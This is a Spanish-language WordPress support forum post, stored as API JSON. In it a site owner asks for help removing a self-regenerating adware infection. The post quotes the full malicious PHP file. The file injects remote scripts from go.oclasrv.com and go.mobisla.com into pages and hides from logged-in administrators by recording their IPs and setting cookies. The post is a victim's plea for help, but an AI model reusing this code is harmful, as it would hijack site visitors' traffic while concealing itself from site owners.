{"id":69941,"date":"2018-01-23T15:08:41","date_gmt":"2018-01-23T15:08:41","guid":{"rendered":"https:\/\/es.wordpress.org\/support\/topic\/como-eliminar-malware-go-oclasrv-com-por-completo\/"},"modified":"2018-01-23T16:54:32","modified_gmt":"2018-01-23T16:54:32","slug":"como-eliminar-malware-go-oclasrv-com-por-completo","status":"publish","type":"topic","link":"https:\/\/es.wordpress.org\/support\/topic\/como-eliminar-malware-go-oclasrv-com-por-completo\/","title":{"rendered":"Como Eliminar malware \u00bb go.oclasrv.com\u00bb por completo"},"content":{"rendered":"<p>Saludos.<br \/>\nEl enlace en referencia es un sitio de pruebas y producci\u00f3n. <\/p>\n<p>Quiero decirles que llevo un par de meses luchando contra este Adware Malware, virus o como quieran llamarle.<br \/>\nSe trata de un codgio que se auto regenera mediante 2 archivos .php, este es el sript. <\/p>\n<p><code>&lt;script type=&quot;text\/javascript&quot; src=&quot;\/\/go.oclasrv.com\/apu.php?zoneid=1527634&quot;&gt;&lt;\/script&gt;<\/code><\/p>\n<p>Ahora bien sabemos que la vulnerabilidad pudo ser detecta en algun plugin o falsa actualizaci\u00f3n descargada e instalada en e sitio, pero lo mas cumbre del caso es que todos las web alojadas fueron infectadas. <\/p>\n<p>Este adware malware o como se le llame es un ladron de trafico, y mientras estas logueado como administrador nunca va a hacerce notar, una vez cierras la sesion  y limpias la cache del navegador comienza a trabajar en tu web en cada click de enlace redirige a otros sitios sin relevancia ( porno, casinos, software basura, apuestas y pare de contar)<\/p>\n<p>Donde se aloja? hasta ahora lo he detecta en la carpeta wp-include y son dos archivos php.  wp-feed.php y wp-temp.php, estos archivos por mas que se borran vuelven a regenerarce, al escanear el sitio con Wordfence el los elimina y los pocos minutos estan regenerados nuevamente infectando el sitio.<\/p>\n<p>Aqui les dejo el codigo de ambos.<br \/>\nwp-temp.php<\/p>\n<pre><code>ini_set(&#039;display_errors&#039;, 0);\r\nerror_reporting(0);\r\n$wp_auth_key=&#039;08b370e35d008b6591dd40b0eec23025&#039;;\r\n\r\nif ( ! function_exists( &#039;slider_option&#039; ) ) {  \r\n\r\nfunction slider_option($content){ \r\nif(is_single())\r\n{\r\n\r\n$con = &#039;\r\n&#039;;\r\n\r\n$con2 = &#039;\r\n&lt;script type=&quot;text\/javascript&quot; src=&quot;\/\/go.oclasrv.com\/apu.php?zoneid=1527634&quot;&gt;&lt;\/script&gt;\r\n&lt;script async=&quot;async&quot; type=&quot;text\/javascript&quot; src=&quot;\/\/go.mobisla.com\/notice.php?p=1527635&amp;interactive=1&amp;pushup=1&quot;&gt;&lt;\/script&gt;\r\n\r\n&#039;;\r\n\r\n$content=$content.$con2;\r\n}\r\nreturn $content;\r\n} \r\n\r\nfunction slider_option_footer(){ \r\nif(!is_single())\r\n{\r\n\r\n$con2 = &#039;\r\n&lt;script type=&quot;text\/javascript&quot; src=&quot;\/\/go.oclasrv.com\/apu.php?zoneid=1527634&quot;&gt;&lt;\/script&gt;\r\n&lt;script async=&quot;async&quot; type=&quot;text\/javascript&quot; src=&quot;\/\/go.mobisla.com\/notice.php?p=1527635&amp;interactive=1&amp;pushup=1&quot;&gt;&lt;\/script&gt;\r\n\r\n&#039;;\r\n\r\necho $con2;\r\n}\r\n} \r\n\r\nfunction setting_my_first_cookie() {\r\n  setcookie( &#039;wordpress_cf_adm_use_adm&#039;,1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);\r\n  }\r\n\r\nif(is_user_logged_in())\r\n{\r\nadd_action( &#039;init&#039;, &#039;setting_my_first_cookie&#039;,1 );\r\n}\r\n\r\nif( current_user_can(&#039;edit_others_pages&#039;))\r\n{\r\n\r\nif (file_exists(ABSPATH.&#039;wp-includes\/wp-feed.php&#039;))\r\n{\r\n$ip=@file_get_contents(ABSPATH.&#039;wp-includes\/wp-feed.php&#039;);\r\n}\r\n\r\nif (stripos($ip, $_SERVER[&#039;REMOTE_ADDR&#039;]) === false)\r\n{\r\n$ip.=$_SERVER[&#039;REMOTE_ADDR&#039;].&#039;\r\n&#039;;\r\n@file_put_contents(ABSPATH.&#039;wp-includes\/wp-feed.php&#039;,$ip);\r\n\r\n}\r\n\r\n}\r\n\r\n$ref = $_SERVER[&#039;HTTP_REFERER&#039;];\r\n$SE = array(&#039;google.&#039;,&#039;\/search?&#039;,&#039;images.google.&#039;, &#039;web.info.com&#039;, &#039;search.&#039;,&#039;yahoo.&#039;,&#039;yandex&#039;,&#039;msn.&#039;,&#039;baidu&#039;,&#039;bing.&#039;,&#039;doubleclick.net&#039;,&#039;googleweblight.com&#039;);\r\nforeach ($SE as $source) {\r\n  if (strpos($ref,$source)!==false) {\r\n    setcookie(&quot;sevisitor&quot;, 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); \r\n\t$sevisitor=true;\r\n  }\r\n}\r\n\r\nif(!isset($_COOKIE[&#039;wordpress_cf_adm_use_adm&#039;]) &amp;&amp; !is_user_logged_in()) \r\n{\r\n$adtxt=@file_get_contents(ABSPATH.&#039;wp-includes\/wp-feed.php&#039;);\r\nif (stripos($adtxt, $_SERVER[&#039;REMOTE_ADDR&#039;]) === false)\r\n{\r\nadd_filter(&#039;the_content&#039;,&#039;slider_option&#039;);\r\nadd_action(&#039;wp_footer&#039;,&#039;slider_option_footer&#039;);\r\nif($sevisitor==true || isset($_COOKIE[&#039;sevisitor&#039;]))\r\n{\r\n\r\n}\r\n\r\n}\r\n\r\n} \r\n\r\n}<\/code><\/pre>\n<p>Y el archivo wp-tem.php solo esta escrita la ip desde donde conecto a mi sitios wordpress. <\/p>\n<p>Como bien lo he mencionado, he hecho todo lo recomendado, nuevas instalaciones de wp, eliminaci\u00f3n de y re instalaci\u00f3n de plugin, he saneado seg\u00fan lo remendado en este foro de soporte&#8230; y nada!! ha Cambie de host, y los problemas contin\u00faan. <\/p>\n<p>Si alguno de vosotros hab\u00e9is tenido este malware y lo ha solucionado, mucho le sabr\u00eda agradecer, ya tengo muchos problemas tratando de recuperar el sitio y algunos de clientes y esto me tiene muy agotado.<\/p>\n<p>Agradeciendo su atenci\u00f3n y colaboraciones al caso.<\/p>\n<p>Quedo atento de vuestros comentarios y agradeciendo la ayuda que me puedan prestar en este caso. <\/p>\n<p>Un saludo. <\/p>\n","protected":false},"template":"","class_list":["post-69941","topic","type-topic","status-publish","hentry","topic-tag-deloplen","topic-tag-hackeo","topic-tag-virus","topic-tag-wordpress"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/es.wordpress.org\/support\/wp-json\/wp\/v2\/topic\/69941","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/es.wordpress.org\/support\/wp-json\/wp\/v2\/topic"}],"about":[{"href":"https:\/\/es.wordpress.org\/support\/wp-json\/wp\/v2\/types\/topic"}],"version-history":[{"count":1,"href":"https:\/\/es.wordpress.org\/support\/wp-json\/wp\/v2\/topic\/69941\/revisions"}],"predecessor-version":[{"id":69947,"href":"https:\/\/es.wordpress.org\/support\/wp-json\/wp\/v2\/topic\/69941\/revisions\/69947"}],"wp:attachment":[{"href":"https:\/\/es.wordpress.org\/support\/wp-json\/wp\/v2\/media?parent=69941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}